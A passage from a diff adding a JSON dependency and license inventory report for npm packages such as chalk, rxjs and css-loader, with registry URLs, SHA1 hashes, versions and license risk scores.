+ "homePage": "https://github.com/chalk/chalk#readme", + "genericPackageIndex": "https://www.npmjs.org/package/chalk" + }, + "matchType": "SHA1", + "sha1": "509afb67066e7499f7eb3535c77445772ae2d019", + "name": "chalk-1.1.1.tgz", + "artifactId": "chalk-1.1.1.tgz", + "version": "1.1.1", + "groupId": "chalk", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/72b2fd5b-a998-4e38-8fa1-15ba013e12dd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "89ef416d-0c0b-44ec-aa66-c1061a06ab29", + "keyId": 27916806, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/css-loader/-/css-loader-3.2.0.tgz", + "homePage": "https://github.com/webpack-contrib/css-loader", + "genericPackageIndex": "https://www.npmjs.org/package/css-loader" + }, + "matchType": "SHA1", + "sha1": "bb570d89c194f763627fcf1f80059c6832d009b2", + "name": "css-loader-3.2.0.tgz", + "artifactId": "css-loader-3.2.0.tgz", + "version": "3.2.0", + "groupId": "css-loader", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b954dbc0-183a-4dcd-8d2e-b378a26482ea" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d8095f0d-2ac6-4f2b-afa6-2475c2b7a1a2", + "keyId": 26965800, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/rxjs/-/rxjs-5.5.12.tgz", + "homePage": "https://github.com/ReactiveX/RxJS", + "genericPackageIndex": "https://www.npmjs.org/package/rxjs" + }, + "matchType": "SHA1", + "sha1": "6fa61b8a77c3d793dbaf270bee2f43f652d741cc", + "name": "rxjs-5.5.12.tgz", + "artifactId": "rxjs-5.5.12.tgz", + "version": "5.5.12", + "groupId": "rxjs", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/rxjs" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a2cf984c-ad84-4f37-a1ae-4a31fd44a4d6", + "keyId": 27095538, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/os-locale/-/os-locale-3.1.0.tgz", + "homePage": "https://github.com/sindresorhus/os-locale#readme", + "genericPackageIndex": "https://www.npmjs.org/package/os-locale" + }, + "matchType": "SHA1", + "sha1": "a802a6ee17f24c10483ab9935719cef4ed16bf1a", + "name": "os-locale-3.1.0.tgz", + "artifactId": "os-locale-3.1.0.tgz", + "version": "3.1.0", + "groupId": "os-locale", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/930e2cf6-8bed-4a09-b978-dc3461a294f1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "64948f4c-0750-4999-8222-5a67ce1d190a", + "keyId": 26954939, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ignore/-/ignore-3.3.10.tgz", + "homePage": "https://github.com/kaelzhang/node-ignore#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ignore" + }, + "matchType": "SHA1", + "sha1": "0a97fb876986e8081c631160f8f9f389157f0043", + "name": "ignore-3.3.10.tgz", + "artifactId": "ignore-3.3.10.tgz", + "version": "3.3.10", + "groupId": "ignore", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/kaelzhang/node-ignore/blob/3.3.10/LICENSE-MIT" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8d94d886-a4dc-454f-9e0d-b1ee6b8d2aa8", + "keyId": 28432196, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-tooltip/-/honeyui-tooltip-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/tooltip#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-tooltip" + }, + "matchType": "SHA1", + "sha1": "0231488f28c8fcddd9d06c42fd5f8ffd23ce9a03", + "name": "honeyui-tooltip-1.1.1.tgz", + "artifactId": "honeyui-tooltip-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-tooltip", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "54ac5fff-b205-4912-8ca8-0f69d3fcfa22", + "keyId": 28432190, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.truncate/-/lodash.truncate-4.4.2.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.truncate" + }, + "matchType": "SHA1", + "sha1": "5a350da0b1113b837ecfffd5812cbe58d6eae193", + "name": "lodash.truncate-4.4.2.tgz", + "artifactId": "lodash.truncate-4.4.2.tgz", + "version": "4.4.2", + "groupId": "lodash.truncate", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.truncate" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ab11d465-3590-4a10-8379-629b35e65e80", + "keyId": 27817406, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.5.0.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/highlight" + }, + "matchType": "SHA1", + "sha1": "56d11312bd9248fa619591d02472be6e8cb32540", + "name": "highlight-7.5.0.tgz", + "artifactId": "highlight-7.5.0.tgz", + "version": "7.5.0", + "groupId": "@babel/highlight", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/highlight" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d5e9632d-8c5a-48a3-934d-7596b6d8584a", + "keyId": 28432157, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/node-gyp-build/-/node-gyp-build-3.9.0.tgz", + "homePage": "https://github.com/mafintosh/node-gyp-build", + "genericPackageIndex": "https://www.npmjs.org/package/node-gyp-build" + }, + "matchType": "SHA1", + "sha1": "53a350187dd4d5276750da21605d1cb681d09e25", + "name": "node-gyp-build-3.9.0.tgz", + "artifactId": "node-gyp-build-3.9.0.tgz", + "version": "3.9.0", + "groupId": "node-gyp-build", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/500563e4-9c79-4405-9168-b63b28d15878" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b880df64-2b6e-4c8a-bbb8-4112b47664a5", + "keyId": 27903606, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "homePage": "https://github.com/nodejs/string_decoder", + "genericPackageIndex": "https://www.npmjs.org/package/string_decoder" + }, + "matchType": "SHA1", + "sha1": "42f114594a46cf1a8e30b0a84f56c78c3edac21e", + "name": "string_decoder-1.3.0.tgz", + "artifactId": "string_decoder-1.3.0.tgz", + "version": "1.3.0", + "groupId": "string_decoder", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/string_decoder/v/1.3.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2594e977-69ed-4235-86d5-f273431baa06", + "keyId": 27772479, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@types/through/-/through-0.0.29.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@types/through" + }, + "matchType": "SHA1", + "sha1": "72943aac922e179339c651fa34a4428a4d722f93", + "name": "through-0.0.29.tgz", + "artifactId": "through-0.0.29.tgz", + "version": "0.0.29", + "groupId": "@types/through", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c9abb30a-1dbe-4894-9e20-5c030ffbf4a4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "287caa25-6895-470a-9be6-1bb831aac6bf", + "keyId": 27939002, + "type": "SOURCE_LIBRARY", + "languages": "JavaScript", + "references": { + "url": "https://github.com/nodejs/node.git", + "homePage": "https://nodejs.org/", + "downloadLink": "https://github.com/nodejs/node/zipball/v8.16.1" + }, + "matchType": "SOURCE_FILE", + "sha1": "5744b466c45d5324c60f122b02681813d4496749", + "name": "node-v8.16.1", + "artifactId": "node", + "version": "v8.16.1", + "groupId": "nodejs", + "licenses": [ + { + "name": "Node.js", + "url": "https://github.com/nodejs/node/blob/master/LICENSE", + "riskLevel": "unknown", + "referenceType": "Project home page", + "reference": "https://github.com/nodejs/node/blob/v8.16.1/LICENSE" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "71f07ef9-b91b-485b-8b76-d5b3c854b240", + "keyId": 26957255, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-2.1.0.tgz", + "homePage": "https://github.com/chalk/wrap-ansi#readme", + "genericPackageIndex": "https://www.npmjs.org/package/wrap-ansi" + }, + "matchType": "SHA1", + "sha1": "d8fc3d284dd05794fe84973caecdd1cf824fdd85", + "name": "wrap-ansi-2.1.0.tgz", + "artifactId": "wrap-ansi-2.1.0.tgz", + "version": "2.1.0", + "groupId": "wrap-ansi", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/wrap-ansi/v/2.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "31eb82d2-6bb5-4e33-8c85-8cc751003d66", + "keyId": 26965562, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/memory-cache/-/memory-cache-0.2.0.tgz", + "homePage": "https://github.com/ptarjan/node-cache#readme", + "genericPackageIndex": "https://www.npmjs.org/package/memory-cache" + }, + "matchType": "SHA1", + "sha1": "7890b01d52c00c8ebc9d533e1f8eb17e3034871a", + "name": "memory-cache-0.2.0.tgz", + "artifactId": "memory-cache-0.2.0.tgz", + "version": "0.2.0", + "groupId": "memory-cache", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3c618c5d-646a-41b1-8ae1-9481efa5b73d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7dac00a8-76ed-422c-9347-f7b930e27772", + "keyId": 26969192, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/env-variable/-/env-variable-0.0.5.tgz", + "homePage": "https://github.com/3rd-Eden/env-variable", + "genericPackageIndex": "https://www.npmjs.org/package/env-variable" + }, + "matchType": "SHA1", + "sha1": "913dd830bef11e96a039c038d4130604eba37f88", + "name": "env-variable-0.0.5.tgz", + "artifactId": "env-variable-0.0.5.tgz", + "version": "0.0.5", + "groupId": "env-variable", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/77b69970-67c3-4604-b819-794ed114ea1a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7165608e-7f1d-4f73-90e5-c84358739be3", + "keyId": 26961813, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cli-table/-/cli-table-0.3.1.tgz", + "homePage": "https://github.com/Automattic/cli-table", + "genericPackageIndex": "https://www.npmjs.org/package/cli-table" + }, + "matchType": "SHA1", + "sha1": "f53b05266a8b1a0b934b3d0821e6e2dc5914ae23", + "name": "cli-table-0.3.1.tgz", + "artifactId": "cli-table-0.3.1.tgz", + "version": "0.3.1", + "groupId": "cli-table", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "Project home page", + "reference": "https://github.com/Automattic/cli-table/tree/0.3.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4ce1d495-bb4f-4b25-a299-d4dfb5f0c115", + "keyId": 28031580, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/webpack-merge/-/webpack-merge-4.2.2.tgz", + "homePage": "https://github.com/survivejs/webpack-merge", + "genericPackageIndex": "https://www.npmjs.org/package/webpack-merge" + }, + "matchType": "SHA1", + "sha1": "a27c52ea783d1398afd2087f547d7b9d2f43634d", + "name": "webpack-merge-4.2.2.tgz", + "artifactId": "webpack-merge-4.2.2.tgz", + "version": "4.2.2", + "groupId": "webpack-merge", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/webpack-merge" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a68dbbcc-b9d2-4d8d-8710-70639b32cf99", + "keyId": 26973584, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/wcwidth/-/wcwidth-1.0.1.tgz", + "homePage": "https://github.com/timoxley/wcwidth#readme", + "genericPackageIndex": "https://www.npmjs.org/package/wcwidth" + }, + "matchType": "SHA1", + "sha1": "f0b0dcf915bc5ff1528afadb2c0e17b532da2fe8", + "name": "wcwidth-1.0.1.tgz", + "artifactId": "wcwidth-1.0.1.tgz", + "version": "1.0.1", + "groupId": "wcwidth", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/wcwidth/v/1.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9f8de0ba-64e0-4e8d-ace5-7550729e24ad", + "keyId": 28432177, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/iterate-object/-/iterate-object-1.3.3.tgz", + "homePage": "https://github.com/IonicaBizau/node-iterate-object", + "genericPackageIndex": "https://www.npmjs.org/package/iterate-object" + }, + "matchType": "SHA1", + "sha1": "c58e60f7f0caefa2d382027a484b215988a7a296", + "name": "iterate-object-1.3.3.tgz", + "artifactId": "iterate-object-1.3.3.tgz", + "version": "1.3.3", + "groupId": "iterate-object", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a0ebb07a-9a66-4717-9d77-6f44d4c66052" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "82fdb389-789a-4900-ab10-91bcf84908ef", + "keyId": 28432202, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/container-info/-/container-info-1.0.1.tgz", + "homePage": "https://github.com/Qard/container-info#readme", + "genericPackageIndex": "https://www.npmjs.org/package/container-info" + }, + "matchType": "SHA1", + "sha1": "6b383cb5e197c8d921e88983388facb04124b56b", + "name": "container-info-1.0.1.tgz", + "artifactId": "container-info-1.0.1.tgz", + "version": "1.0.1", + "groupId": "container-info", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6de51f00-dd33-441b-a6e7-19871ae08335" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "28c8fa60-ff66-40f3-a95e-15931316e9ea", + "keyId": 28308638, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@contentful/rich-text-types/-/rich-text-types-13.4.0.tgz", + "homePage": "https://github.com/contentful/rich-text#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@contentful/rich-text-types" + }, + "matchType": "SHA1", + "sha1": "a59c311ebd1b801ee00edbc08663c8d78da26171", + "name": "rich-text-types-13.4.0.tgz", + "artifactId": "rich-text-types-13.4.0.tgz", + "version": "13.4.0", + "groupId": "@contentful/rich-text-types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5b148e78-6e14-4ffa-92ae-596284eb2a19" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "983d20ed-b60e-4cc6-861c-445d3350a805", + "keyId": 26948465, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/onetime/-/onetime-1.1.0.tgz", + "homePage": "https://github.com/sindresorhus/onetime", + "genericPackageIndex": "https://www.npmjs.org/package/onetime" + }, + "matchType": "SHA1", + "sha1": "a1f7838f8314c516f05ecefcbc4ccfe04b4ed789", + "name": "onetime-1.1.0.tgz", + "artifactId": "onetime-1.1.0.tgz", + "version": "1.1.0", + "groupId": "onetime", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d42b0e87-66d0-4cf0-9d0d-998455893f9a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "368ab865-21b4-406d-98a4-38ff95bee1c2", + "keyId": 27870129, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/koalas/-/koalas-1.0.2.tgz", + "homePage": "https://github.com/doowb/koalas", + "genericPackageIndex": "https://www.npmjs.org/package/koalas" + }, + "matchType": "SHA1", + "sha1": "318433f074235db78fae5661a02a8ca53ee295cd", + "name": "koalas-1.0.2.tgz", + "artifactId": "koalas-1.0.2.tgz", + "version": "1.0.2", + "groupId": "koalas", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/koalas" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a039e436-2abc-43bd-823d-3b1b34621b51", + "keyId": 26955391, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-2.0.2.tgz", + "homePage": "https://github.com/sindresorhus/npm-run-path#readme", + "genericPackageIndex": "https://www.npmjs.org/package/npm-run-path" + }, + "matchType": "SHA1", + "sha1": "35a9232dfa35d7067b4cb2ddf2357b1871536c5f", + "name": "npm-run-path-2.0.2.tgz", + "artifactId": "npm-run-path-2.0.2.tgz", + "version": "2.0.2", + "groupId": "npm-run-path", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2f4b25ba-e3be-43ae-a6e6-76252ab7b0b2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3828b90a-eacc-4724-8e59-6a4d0cff8f3e", + "keyId": 27287290, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/babel-plugin-transform-react-remove-prop-types/-/babel-plugin-transform-react-remove-prop-types-0.4.24.tgz", + "homePage": "https://github.com/oliviertassinari/babel-plugin-transform-react-remove-prop-types#readme", + "genericPackageIndex": "https://www.npmjs.org/package/babel-plugin-transform-react-remove-prop-types" + }, + "matchType": "SHA1", + "sha1": "f2edaf9b4c6a5fbe5c1d678bfb531078c1555f3a", + "name": "babel-plugin-transform-react-remove-prop-types-0.4.24.tgz", + "artifactId": "babel-plugin-transform-react-remove-prop-types-0.4.24.tgz", + "version": "0.4.24", + "groupId": "babel-plugin-transform-react-remove-prop-types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/babel-plugin-transform-react-remove-prop-types" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "243f7942-91be-43a0-9c6c-1a5595b6b7cf", + "keyId": 28432159, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-carousel/-/honeyui-carousel-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/carousel#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-carousel" + }, + "matchType": "SHA1", + "sha1": "f0961106022cf0c1fce894d50ec5654ad00f8b25", + "name": "honeyui-carousel-1.1.1.tgz", + "artifactId": "honeyui-carousel-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-carousel", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9b3d27d4-812f-4c82-bfdd-21267f531bc4", + "keyId": 27287366, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/css-prefers-color-scheme/-/css-prefers-color-scheme-3.1.1.tgz", + "homePage": "https://github.com/csstools/css-prefers-color-scheme#readme", + "genericPackageIndex": "https://www.npmjs.org/package/css-prefers-color-scheme" + }, + "matchType": "SHA1", + "sha1": "6f830a2714199d4f0d0d0bb8a27916ed65cff1f4", + "name": "css-prefers-color-scheme-3.1.1.tgz", + "artifactId": "css-prefers-color-scheme-3.1.1.tgz", + "version": "3.1.1", + "groupId": "css-prefers-color-scheme", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3b922083-f6c3-4355-9b52-ec55363c74e2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bcf83c91-d793-42e1-bd57-dc6184855b82", + "keyId": 28078127, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-retry-allowed/-/is-retry-allowed-1.2.0.tgz", + "homePage": "https://github.com/floatdrop/is-retry-allowed#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-retry-allowed" + }, + "matchType": "SHA1", + "sha1": "d778488bd0a4666a3be8a1482b9f2baafedea8b4", + "name": "is-retry-allowed-1.2.0.tgz", + "artifactId": "is-retry-allowed-1.2.0.tgz", + "version": "1.2.0", + "groupId": "is-retry-allowed", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-retry-allowed" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "57e9dfb9-c510-4b20-b95c-c1ce9bacbe6c", + "keyId": 27974486, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/style-loader/-/style-loader-1.0.0.tgz", + "homePage": "https://github.com/webpack-contrib/style-loader", + "genericPackageIndex": "https://www.npmjs.org/package/style-loader" + }, + "matchType": "SHA1", + "sha1": "1d5296f9165e8e2c85d24eee0b7caf9ec8ca1f82", + "name": "style-loader-1.0.0.tgz", + "artifactId": "style-loader-1.0.0.tgz", + "version": "1.0.0", + "groupId": "style-loader", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/style-loader" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2c9df6ad-e8ae-4939-ba6d-0a6110f33061", + "keyId": 28432175, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/opentracing/-/opentracing-0.14.4.tgz", + "homePage": "https://github.com/opentracing/opentracing-javascript#readme", + "genericPackageIndex": "https://www.npmjs.org/package/opentracing" + }, + "matchType": "SHA1", + "sha1": "a113408ea740da3a90fde5b3b0011a375c2e4268", + "name": "opentracing-0.14.4.tgz", + "artifactId": "opentracing-0.14.4.tgz", + "version": "0.14.4", + "groupId": "opentracing", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": 